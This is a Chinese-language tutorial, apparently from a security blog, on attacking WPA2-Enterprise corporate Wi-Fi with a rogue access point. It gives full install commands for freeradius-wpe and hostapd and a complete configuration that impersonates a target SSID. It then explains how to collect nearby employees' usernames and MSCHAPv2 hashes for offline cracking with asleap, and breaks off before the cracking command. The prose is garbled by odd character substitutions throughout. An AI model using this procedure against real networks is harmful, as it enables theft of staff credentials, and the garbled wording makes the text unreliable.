針對開放式(沒有暗碼)無線網絡的企業進攻，我小我私家感受較量經典的進攻方法有2種，一種是eviltwin，一種是karma。karma應該是eviltwin進攻手法的進級版，進攻者只需要簡樸的監聽客戶端發的ssid探測和響應包就可以實現中間人了，受害者很少會有察覺。并且坊間曾有一個錯誤的認識，認為埋沒的ssid是不受karma影響的。可是實際環境是，客戶端假如曾經毗連過埋沒的ssid，，也會廣播這些網絡的探測包。盡量karma這種進攻方法已經有10多年的汗青了，可是在MAC OSX，ubuntu，老版本的andorid系統上依然有效。win7的默認設置居然是防護karma進攻的。

對加密的無線網絡，針對小我私家網絡，許多是利用wpa2-psk預共享密鑰的要領來限制會見。而公司的無線網絡有利用wpa2企業認證的，也有利用radius處事提供獨立的用戶名和暗碼來實現802.1x尺度認證的。

---

我這里是的進攻是利用hostapd飾演一個無線會見點，然后通過打補丁的freeraidus wpe來捕獲暗碼hash，最后用asleep來離線破解暗碼，來反抗相對安詳的利用radius處事器提供獨立的用戶名和暗碼實現的802.1x認證的企業無線網絡情況。

所需設備：

TP-LINK TL-WN821N
Kali 1.1.0

首先安裝freeradius-wpe,既可以利用dpkg直接安裝freeradius-server-wpe_2.1.12-1_i386.deb,也可以通過源碼編譯來安裝，通過deb包安裝要領的呼吁如下：

wget https://github.com/brad-anton/freeradius-wpe/raw/master/freeradius-server-wpe_2.1.12-1_i386.deb
dpkg --install freeradius-server-wpe_2.1.12-1_i386.deb
ldconfig
cd /usr/local/etc/raddb/certs
./bootstrap && ldconfig

通過源碼安裝的步調如下：

git clone https://github.com/brad-anton/freeradius-wpe.git
wget ftp://ftp.freeradius.org/pub/freeradius/freeradius-server-2.1.12.tar.bz2
tar jxvf freeradius-server-2.1.12.tar.bz2
patch -p1 < ../freeradius-wpe.patch
./configure
make install

然后執行radiusd -X開啟debug模式驗證是否安裝樂成，假如運行此呼吁的時候提示

Failed binding to /usr/local/var/run/radiusd/radiusd.sock: No such file or directory

則需要成立相應的目次

[email protected]:/usr/local/etc/raddb/certs# mkdir -p /usr/local/var/run/radiusd/

接下來安裝hostapd，呼吁如下：

wget http://hostap.epitest.fi/releases/hostapd-2.0.tar.gz
tar zxvf hostapd-2.0.tar.gz
cd hostapd-2.0/hostapd/
cp defconfig .config
make

假如安裝的時候提示：

../src/drivers/driver_nl80211.c:19:31: fatal error: netlink/genl/genl.h: No such file or directory
compilation terminated.
make: *** [../src/drivers/driver_nl80211.o] Error 1

則需要安裝libnl開拓包，呼吁如下：

[email protected]:/hostapd-2.0/hostapd# sudo apt-get install libnl1 libnl-dev

然后編輯hostapd-wpe.conf文件，如下

interface=wlan0
driver=nl80211
ssid=corp-lobby
country_code=DE
logger_stdout=-1
logger_stdout_level=0
dump_file=/tmp/hostapd.dump
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
auth_algs=3
wpa=2
wpa_key_mgmt=WPA-EAP
channel=1
wpa_pairwise=CCMP
rsn_pairwise=CCMP

實際操縱需要修改的處所只有ssid項，假如你的方針企業無線網絡的ssid叫corp-lobby，則修改ssid=corp-lobby,運行 hostapd -dd hostapd-wpe.conf 開啟偽造的無線熱點

這時候假如有企業員工在你四周，他的手時機自動毗連你的偽造的無線熱點，你就可以通過

tail -f /usr/local/var/log/radius/freeradius-server-wpe.log

看到抓到的用戶名和MSCHAPv2的響應hash和挑戰hash。

有了challenge和response，就可以利用asleep東西來基于字典的暴力破解，呼吁如下